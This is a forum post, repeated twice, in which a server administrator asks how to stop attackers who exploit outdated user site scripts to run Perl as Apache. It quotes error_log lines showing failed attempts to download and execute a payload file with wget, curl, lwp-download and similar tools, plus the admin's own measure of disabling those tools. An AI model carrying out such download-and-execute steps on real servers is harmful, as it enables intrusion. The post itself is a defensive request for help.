Hello,
I've been dealing with this problem on several servers for some time now. From time to time, there always seems to be some user's site that uses some outdated forum script or something, that ends up allowing a hacker to run perl script using apache.
I've done the usual thing of disabling wget and other transfer proggies. I also installed mod_security. But they still get through!
I see stuff like this in my error_log all the time:
sh: /usr/bin/wget: Permission denied
Can't open perl script "baru.txt": No such file or directory.
Use -S to search $PATH for it.
sh: /usr/bin/curl: Permission denied
Can't open perl script "baru.txt": No such file or directory.
Use -S to search $PATH for it.
sh: /usr/bin/lwp-download: Permission denied
Can't open perl script "baru.txt": No such file or directory.
Use -S to search $PATH for it.
sh: lynx: command not found
sh: fetch: command not found
sh: /usr/bin/wget: Permission denied
Can't open perl script "baru.txt": No such file or directory.
Use -S to search $PATH for it.
I just can't figure out which site is being exploited to do this. They try a bunch of things that don't work. Then eventually, I'm not sure who, they end up able to execute their code which results in apache executing a couple of perl scripts that run themselves as apache and show up as such in "ps auxww" and "top". I have to manually kill them each time.
Is there anything I can do to stop this??
I've been dealing with this problem on several servers for some time now. From time to time, there always seems to be some user's site that uses some outdated forum script or something, that ends up allowing a hacker to run perl script using apache.
I've done the usual thing of disabling wget and other transfer proggies. I also installed mod_security. But they still get through!
I see stuff like this in my error_log all the time:
sh: /usr/bin/wget: Permission denied
Can't open perl script "baru.txt": No such file or directory.
Use -S to search $PATH for it.
sh: /usr/bin/curl: Permission denied
Can't open perl script "baru.txt": No such file or directory.
Use -S to search $PATH for it.
sh: /usr/bin/lwp-download: Permission denied
Can't open perl script "baru.txt": No such file or directory.
Use -S to search $PATH for it.
sh: lynx: command not found
sh: fetch: command not found
sh: /usr/bin/wget: Permission denied
Can't open perl script "baru.txt": No such file or directory.
Use -S to search $PATH for it.
I just can't figure out which site is being exploited to do this. They try a bunch of things that don't work. Then eventually, I'm not sure who, they end up able to execute their code which results in apache executing a couple of perl scripts that run themselves as apache and show up as such in "ps auxww" and "top". I have to manually kill them each time.
Is there anything I can do to stop this??